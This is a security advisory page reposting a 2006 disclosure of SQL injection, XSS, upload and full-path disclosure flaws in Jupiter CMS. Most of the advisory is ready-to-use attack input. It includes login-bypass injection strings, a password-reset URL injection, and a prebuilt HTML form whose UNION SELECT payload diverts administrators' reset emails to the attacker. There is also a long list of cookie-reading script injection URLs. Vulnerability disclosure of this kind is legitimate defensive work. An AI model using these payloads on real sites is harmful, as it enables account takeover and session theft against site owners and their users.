|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 1608 CVE : CVE-2006-4876 CVE : CVE-2006-4875 CVE : CVE-2006-4874 CVE : CVE-2006-4873 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : HACKERS PAL Published : 22.09.2006
Advisory Content : Hello,, Jupiter CMS Sql injections ,full path and xss vulnerabilities Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security (at) soqor (dot) net [email concealed] if magic_quotes_gpc = off login with user name : ' or id=1/* or ' or authorization = 4/* you will be loged in with full permission ------------------------- index.php?n=modules/register&a=3&d=3&key='%20or%20id=1/* You will be able to change the password for any user .. know his id and put it in the url. -- or you can use this form by changing http://localhost/jupiter/ to the website dir to recive reset password email to all the administrators <form method="post" action="http://localhost/jupiter/index.php?n=modules/register"> <table class="main" cellspacing="1" cellpadding="4" width="100%"> <tr class="head"> <td colspan="2" class="head">Forgot your password?</td> </tr> <tr> <td class="con1" width="42%" valign="middle"><span class="hilight">Username:</span></td> <td class="con1" width="58%" valign="bottom"><input type="text" name="fpwusername" style="width:100%" class="box" tabindex="5" value="' union select id,authorization ,username ,password ,'security (at) soqor (dot) net [email concealed]',url,age,flag,location,registered,lastvisit,forum_l astvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar, hideemail,templates,calendarbday,status,multikey,actime from users where id=1or authorization=4/*"></td> </tr> <tr> <td class="con1"><input type="button" style="width:100" class="box" value="Back" onClick="window.history.go(-1);" tabindex="8"></td> <td class="con1" align="right"><input type="submit" style="width:100" class="box" value="Submit" tabindex="7"></td> </tr> <input type="hidden" name="a" value="3"> <input type="hidden" name="d" value="1"> </table> </form> put the user name value Change security (at) soqor (dot) net [email concealed] to your email ' union select id,authorization ,username ,password ,'security (at) soqor (dot) net [email concealed]',url,age,flag,location,registered,lastvisit,forum_l astvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar, hideemail,templates,calendarbday,status,multikey,actime from users where id=1or authorization=4/* /********************************************/ Upload any picture to their gallery modules/galleryuploadfunction.php picture path will be gallery/albums/public/name.ext /********************************************/ xss (Cross site scripting) modules/blocks.php?is_webmaster=2&language[Admin%20name]=<script>alert(d ocument.cookie);</script> modules/blocks.php?is_webmaster=2&language[Admin%20back]=<script>alert(d ocument.cookie);</script> modules/register.php?is_guest=1&language[Register%20title]=<script>alert (document.cookie);</script> modules/register.php?is_guest=1&language[Register%20title2]=<script>aler t(document.cookie);</script> modules/mass-email.php?language[Mass-Email%20form%20title]=<script>alert (document.cookie);</script> modules/mass-email.php?language[Mass-Email%20form%20desc]=<script>alert( document.cookie);</script> modules/mass-email.php?language[Mass-Email%20form%20desc2]=<script>alert (document.cookie);</script> change the value for language[Mass-Email%20form%20desc(2-4)] modules/register.php?is_guest=1&a=3&language[Forgotten%20title]=<script> alert(document.cookie);</script> modules/register.php?is_guest=1&a=3&language[Forgotten%20desc]=<script>a lert(document.cookie);</script> modules/register.php?is_guest=1&a=3&language[Forgotten%20desc2]=<script> alert(document.cookie);</script> change the var value for language[Forgotten%20desc(2 - 5)] modules/search.php?language[Search%20view%20desc]=<script>alert(document .cookie);</script> modules/search.php?language[Search%20view%20desc2]=<script>alert(documen t.cookie);</script> Change the value for language[Search%20view%20desc(2-8)] /********************************************/ Full path includes/functions.php modules/register.php?is_guest=1 modules/online.php modules/poll.php modules/panel.php modules/pm.php modules/news.php modules/templates_change.php modules/users.php modules/misc.php?a=1&is_webmaster=1 modules/masspm.php modules/mass-email.php?subject_choice=1&message_choice=1&a=1 modules/main-nav.php modules/login.php modules/layout.php?is_webmaster=2 modules/hq.php modules/forum.php modules/forum-admin.php?n=modules/forum-admin&a=1 modules/events.php modules/emoticons.php modules/download.php modules/blocks.php?is_webmaster=2 modules/ban.php modules/badwords.php modules/ads.php modules/admin.php /********************************************/ WwW.SoQoR.NeT  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |